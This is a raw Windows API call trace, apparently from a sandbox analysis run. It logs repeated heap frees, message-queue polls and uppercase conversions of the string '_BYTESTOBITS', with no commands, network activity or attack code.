HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.715] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.715] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.715] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.715] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.715] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.715] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0071.716] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.716] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.717] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.718] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0071.719] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.719] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.719] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.719] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.719] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.719] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.719] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.720] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.720] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.720] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.720] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.720] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.720] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.721] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.721] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.721] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.721] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.721] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.721] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.721] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.721] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.722] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.722] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.722] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.722] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.722] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.722] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.722] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.722] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.723] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.723] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.723] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.723] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.723] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.723] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.723] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.724] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.724] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.724] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.724] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.724] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.724] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.724] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.725] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.725] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.725] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.725] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.725] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.725] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.725] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.725] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.726] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.726] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.726] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.726] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.726] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.726] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.726] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.726] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.727] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.727] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.727] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.727] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.727] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.727] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.727] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.728] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.728] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.728] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.728] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.728] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.728] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.728] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.728] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.729] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.729] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.729] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.729] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.729] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.729] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.729] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.729] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.730] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.730] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.730] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.730] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.730] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.730] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.733] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.733] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.733] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.733] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc 